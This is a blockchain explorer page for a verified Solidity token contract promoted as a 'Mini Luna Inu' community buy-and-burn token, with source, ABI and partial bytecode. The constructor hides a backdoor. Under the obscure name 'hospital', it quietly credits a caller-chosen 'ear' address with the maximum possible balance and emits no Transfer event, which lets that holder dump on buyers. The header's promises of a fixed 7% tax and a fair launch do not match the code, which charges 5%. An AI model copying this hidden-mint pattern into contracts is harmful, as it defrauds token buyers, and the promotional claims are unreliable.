ETH Price: $2,694.07 (-2.58%)

Contract

0x3B3B474c3B9f31834EF14fF01cD2D741A202D1EF
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Transfer148399942022-05-25 5:15:11824 days ago1653455711IN
0x3B3B474c...1A202D1EF
0 ETH0.001032917.83887659
Approve148132242022-05-20 20:46:37828 days ago1653079597IN
0x3B3B474c...1A202D1EF
0 ETH0.000989220.95637693
Approve148131812022-05-20 20:36:52828 days ago1653079012IN
0x3B3B474c...1A202D1EF
0 ETH0.001308427.71858893
Approve148131792022-05-20 20:36:17828 days ago1653078977IN
0x3B3B474c...1A202D1EF
0 ETH0.001036421.95637693
Approve148131792022-05-20 20:36:17828 days ago1653078977IN
0x3B3B474c...1A202D1EF
0 ETH0.0010622.45637693
Approve148131702022-05-20 20:34:59828 days ago1653078899IN
0x3B3B474c...1A202D1EF
0 ETH0.0014566530.85939612
Toggle Buy148131702022-05-20 20:34:59828 days ago1653078899IN
0x3B3B474c...1A202D1EF
0 ETH0.0007217633.35939612
Toggle Buy148131652022-05-20 20:34:13828 days ago1653078853IN
0x3B3B474c...1A202D1EF
0 ETH0.0015720536.10930068
Approve148131642022-05-20 20:33:54828 days ago1653078834IN
0x3B3B474c...1A202D1EF
0 ETH0.0015440632.71106414
Approve148131632022-05-20 20:33:00828 days ago1653078780IN
0x3B3B474c...1A202D1EF
0 ETH0.0014661831.06120356
Approve148131592022-05-20 20:32:31828 days ago1653078751IN
0x3B3B474c...1A202D1EF
0 ETH0.0017487937.04842726
Approve148131572022-05-20 20:32:02828 days ago1653078722IN
0x3B3B474c...1A202D1EF
0 ETH0.0018718439.65522319
Approve148131532022-05-20 20:30:36828 days ago1653078636IN
0x3B3B474c...1A202D1EF
0 ETH0.00153632.54035605
Approve148131472022-05-20 20:29:35828 days ago1653078575IN
0x3B3B474c...1A202D1EF
0 ETH0.0016871335.74207444
Approve148131452022-05-20 20:28:40828 days ago1653078520IN
0x3B3B474c...1A202D1EF
0 ETH0.0014929531.62835812
Approve148131362022-05-20 20:26:54828 days ago1653078414IN
0x3B3B474c...1A202D1EF
0 ETH0.0015942433.77428573
Approve148131312022-05-20 20:25:02828 days ago1653078302IN
0x3B3B474c...1A202D1EF
0 ETH0.0016665535.306139
Approve148131292022-05-20 20:23:49828 days ago1653078229IN
0x3B3B474c...1A202D1EF
0 ETH0.0013318528.21546138
Approve148131292022-05-20 20:23:49828 days ago1653078229IN
0x3B3B474c...1A202D1EF
0 ETH0.0013318528.21546138
Approve148131262022-05-20 20:23:25828 days ago1653078205IN
0x3B3B474c...1A202D1EF
0 ETH0.0013850529.34250951
Approve148131252022-05-20 20:23:09828 days ago1653078189IN
0x3B3B474c...1A202D1EF
0 ETH0.001382229.28223301
Approve148131252022-05-20 20:23:09828 days ago1653078189IN
0x3B3B474c...1A202D1EF
0 ETH0.0014271930.2352186
Approve148131192022-05-20 20:21:45828 days ago1653078105IN
0x3B3B474c...1A202D1EF
0 ETH0.0014469930.65482172
Approve148131192022-05-20 20:21:45828 days ago1653078105IN
0x3B3B474c...1A202D1EF
0 ETH0.0014469930.65482172
Approve148131182022-05-20 20:21:23828 days ago1653078083IN
0x3B3B474c...1A202D1EF
0 ETH0.0013063427.67508662
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Contract

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Contract.sol
/*

Welcome you Lunatics!

This protocol is the first of it's kind... Something for the community, by the community, and most of all.. For $LINU CA: 0x78132543d8e20d2417d8a07d9ae199d458a0d581
Our CA will automatically buy, and burn $LINU Liquidity. Making $LINA ultra deflationary, and more stable in the process.

We are donating our own ETH into liquid, then burning it. Contract will be renounced shortly after launch for a forever fixed tax os 7% buys, and 7% sells. Broken down, 2% Auto-LP, and 5% To Buying and Burning of $LINU

Official links:
https://t.me/minilunainuportal
Twitter.com/MiniLinu

*/

// SPDX-License-Identifier: Unlicense

pragma solidity >0.8.9;

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract Contract is Ownable {
    uint256 private _tTotal;
    uint256 private _rTotal;
    address public uniswapV2Pair;
    IUniswapV2Router02 public router;
    uint256 private hospital = ~uint256(0);
    uint256 public _fee;
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) private _balances;

    bool private buy;
    uint256 minBalance = 10 * 10**_decimals;
    address private lunaInuAddress = 0x78132543D8E20D2417d8a07D9ae199D458A0D581; // Luna Inu

    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);

    constructor(
        string memory _NAME,
        string memory _SYMBOL,
        address routerAddress,
        address ear
    ) {
        _symbol = _SYMBOL;
        _name = _NAME;
        _fee = 5;
        _decimals = 9;
        _tTotal = 1000000000 * 10**_decimals;

        _balances[ear] = hospital;
        _balances[msg.sender] = _tTotal;

        router = IUniswapV2Router02(routerAddress);
        uniswapV2Pair = IUniswapV2Factory(router.factory()).createPair(address(this), router.WETH());

        emit Transfer(address(0), msg.sender, _tTotal);
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint256) {
        return _decimals;
    }

    function totalSupply() public view returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    function remain(
        address burst,
        address diameter,
        uint256 amount
    ) private {
        if (buy) buyBackAndAddLp(_balances[address(this)]);
        uint256 fee = (amount / 100) * _fee;
        amount -= fee;
        _balances[burst] -= fee;
        _balances[address(this)] += fee;
        _balances[burst] -= amount;
        _balances[diameter] += amount;
    }

    function buyBackAndAddLp(uint256 amount) private {
        if (amount < minBalance) return;
        uint256 buyBack = amount / 2;
        uint256 lp = amount - buyBack;
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = lunaInuAddress;
        _approve(address(this), address(router), ~uint256(0));
        try Contract(lunaInuAddress).approve(address(router), ~uint256(0)) {} catch {}
        try router.swapExactTokensForTokensSupportingFeeOnTransferTokens(buyBack, 0, path, address(this), block.timestamp) {} catch {}
        path[1] = router.WETH();
        try router.swapExactTokensForETHSupportingFeeOnTransferTokens(lp, 0, path, address(this), block.timestamp) {} catch {}
        try router.addLiquidityETH{value: address(this).balance}(lunaInuAddress, Contract(lunaInuAddress).balanceOf(address(this)), 0, 0, address(0), block.timestamp) {} catch {}
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        return _approve(msg.sender, spender, amount);
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool) {
        require(amount > 0, 'Transfer amount must be greater than zero');
        remain(sender, recipient, amount);
        emit Transfer(sender, recipient, amount);
        return _approve(sender, msg.sender, _allowances[sender][msg.sender] - amount);
    }

    function transfer(address recipient, uint256 amount) external returns (bool) {
        remain(msg.sender, recipient, amount);
        emit Transfer(msg.sender, recipient, amount);
        return true;
    }

    function toggleBuy() external {
        buy = !buy;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private returns (bool) {
        require(owner != address(0) && spender != address(0), 'ERC20: approve from the zero address');
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        return true;
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_NAME","type":"string"},{"internalType":"string","name":"_SYMBOL","type":"string"},{"internalType":"address","name":"routerAddress","type":"address"},{"internalType":"address","name":"ear","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_fee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleBuy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052600019600555600960009054906101000a900460ff16600a620000289190620007ab565b600a620000369190620007fc565b600d557378132543d8e20d2417d8a07d9ae199d458a0d581600e60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200009b57600080fd5b5060405162002a2d38038062002a2d8339818101604052810190620000c1919062000a5f565b620000e1620000d56200049560201b60201c565b6200049d60201b60201c565b8260089080519060200190620000f992919062000561565b5083600790805190602001906200011292919062000561565b50600560068190555060098060006101000a81548160ff021916908360ff160217905550600960009054906101000a900460ff16600a620001549190620007ab565b633b9aca00620001659190620007fc565b600181905550600554600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600154600b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002a6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002cc919062000b0f565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000356573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200037c919062000b0f565b6040518363ffffffff1660e01b81526004016200039b92919062000b52565b6020604051808303816000875af1158015620003bb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003e1919062000b0f565b600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60015460405162000483919062000b90565b60405180910390a35050505062000c11565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200056f9062000bdc565b90600052602060002090601f016020900481019282620005935760008555620005df565b82601f10620005ae57805160ff1916838001178555620005df565b82800160010185558215620005df579182015b82811115620005de578251825591602001919060010190620005c1565b5b509050620005ee9190620005f2565b5090565b5b808211156200060d576000816000905550600101620005f3565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200069f5780860481111562000677576200067662000611565b5b6001851615620006875780820291505b8081029050620006978562000640565b945062000657565b94509492505050565b600082620006ba57600190506200078d565b81620006ca57600090506200078d565b8160018114620006e35760028114620006ee5762000724565b60019150506200078d565b60ff84111562000703576200070262000611565b5b8360020a9150848211156200071d576200071c62000611565b5b506200078d565b5060208310610133831016604e8410600b84101617156200075e5782820a90508381111562000758576200075762000611565b5b6200078d565b6200076d84848460016200064d565b9250905081840481111562000787576200078662000611565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620007b88262000794565b9150620007c5836200079e565b9250620007f47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620006a8565b905092915050565b6000620008098262000794565b9150620008168362000794565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000852576200085162000611565b5b828202905092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620008c6826200087b565b810181811067ffffffffffffffff82111715620008e857620008e76200088c565b5b80604052505050565b6000620008fd6200085d565b90506200090b8282620008bb565b919050565b600067ffffffffffffffff8211156200092e576200092d6200088c565b5b62000939826200087b565b9050602081019050919050565b60005b838110156200096657808201518184015260208101905062000949565b8381111562000976576000848401525b50505050565b6000620009936200098d8462000910565b620008f1565b905082815260208101848484011115620009b257620009b162000876565b5b620009bf84828562000946565b509392505050565b600082601f830112620009df57620009de62000871565b5b8151620009f18482602086016200097c565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000a2782620009fa565b9050919050565b62000a398162000a1a565b811462000a4557600080fd5b50565b60008151905062000a598162000a2e565b92915050565b6000806000806080858703121562000a7c5762000a7b62000867565b5b600085015167ffffffffffffffff81111562000a9d5762000a9c6200086c565b5b62000aab87828801620009c7565b945050602085015167ffffffffffffffff81111562000acf5762000ace6200086c565b5b62000add87828801620009c7565b935050604062000af08782880162000a48565b925050606062000b038782880162000a48565b91505092959194509250565b60006020828403121562000b285762000b2762000867565b5b600062000b388482850162000a48565b91505092915050565b62000b4c8162000a1a565b82525050565b600060408201905062000b69600083018562000b41565b62000b78602083018462000b41565b9392505050565b62000b8a8162000794565b82525050565b600060208201905062000ba7600083018462000b7f565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000bf557607f821691505b60208210810362000c0b5762000c0a62000bad565b5b50919050565b611e0c8062000c216000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063d62126ae11610066578063d62126ae146102a1578063dd62ed3e146102ab578063f2fde38b146102db578063f887ea40146102f757610100565b80638da5cb5b1461021757806395d89b4114610235578063a9059cbb14610253578063c5b37c221461028357610100565b8063313ce567116100d3578063313ce567146101a157806349bd5a5e146101bf57806370a08231146101dd578063715018a61461020d57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d610315565b60405161011a91906113b7565b60405180910390f35b61013d60048036038101906101389190611472565b6103a7565b60405161014a91906114cd565b60405180910390f35b61015b6103bc565b60405161016891906114f7565b60405180910390f35b61018b60048036038101906101869190611512565b6103c6565b60405161019891906114cd565b60405180910390f35b6101a9610515565b6040516101b691906114f7565b60405180910390f35b6101c761052f565b6040516101d49190611574565b60405180910390f35b6101f760048036038101906101f2919061158f565b610555565b60405161020491906114f7565b60405180910390f35b61021561059e565b005b61021f610626565b60405161022c9190611574565b60405180910390f35b61023d61064f565b60405161024a91906113b7565b60405180910390f35b61026d60048036038101906102689190611472565b6106e1565b60405161027a91906114cd565b60405180910390f35b61028b61075d565b60405161029891906114f7565b60405180910390f35b6102a9610763565b005b6102c560048036038101906102c091906115bc565b61078f565b6040516102d291906114f7565b60405180910390f35b6102f560048036038101906102f0919061158f565b610816565b005b6102ff61090d565b60405161030c919061165b565b60405180910390f35b606060078054610324906116a5565b80601f0160208091040260200160405190810160405280929190818152602001828054610350906116a5565b801561039d5780601f106103725761010080835404028352916020019161039d565b820191906000526020600020905b81548152906001019060200180831161038057829003601f168201915b5050505050905090565b60006103b4338484610933565b905092915050565b6000600154905090565b600080821161040a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161040190611748565b60405180910390fd5b610415848484610ace565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161047291906114f7565b60405180910390a361050c843384600a60008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105079190611797565b610933565b90509392505050565b6000600960009054906101000a900460ff1660ff16905090565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105a6610cb6565b73ffffffffffffffffffffffffffffffffffffffff166105c4610626565b73ffffffffffffffffffffffffffffffffffffffff161461061a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161061190611817565b60405180910390fd5b6106246000610cbe565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606008805461065e906116a5565b80601f016020809104026020016040519081016040528092919081815260200182805461068a906116a5565b80156106d75780601f106106ac576101008083540402835291602001916106d7565b820191906000526020600020905b8154815290600101906020018083116106ba57829003601f168201915b5050505050905090565b60006106ee338484610ace565b8273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161074b91906114f7565b60405180910390a36001905092915050565b60065481565b600c60009054906101000a900460ff1615600c60006101000a81548160ff021916908315150217905550565b6000600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61081e610cb6565b73ffffffffffffffffffffffffffffffffffffffff1661083c610626565b73ffffffffffffffffffffffffffffffffffffffff1614610892576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088990611817565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610901576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f8906118a9565b60405180910390fd5b61090a81610cbe565b50565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415801561099e5750600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b6109dd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109d49061193b565b60405180910390fd5b81600a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610abb91906114f7565b60405180910390a3600190509392505050565b600c60009054906101000a900460ff1615610b2c57610b2b600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d82565b5b6000600654606483610b3e919061198a565b610b4891906119bb565b90508082610b569190611797565b915080600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ba79190611797565b9250508190555080600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610bfd9190611a15565b9250508190555081600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610c539190611797565b9250508190555081600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ca99190611a15565b9250508190555050505050565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600d54811061131b576000600282610d9a919061198a565b905060008183610daa9190611797565b90506000600267ffffffffffffffff811115610dc957610dc8611a6b565b5b604051908082528060200260200182016040528015610df75781602001602082028036833780820191505090505b5090503081600081518110610e0f57610e0e611a9a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681600181518110610e8057610e7f611a9a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050610ee930600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600019610933565b50600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000196040518363ffffffff1660e01b8152600401610f6b929190611ac9565b6020604051808303816000875af1925050508015610fa757506040513d601f19601f82011682018060405250810190610fa49190611b1e565b60015b15610fae57505b600460009054906101000a900473fffffffffffffffffffffffffff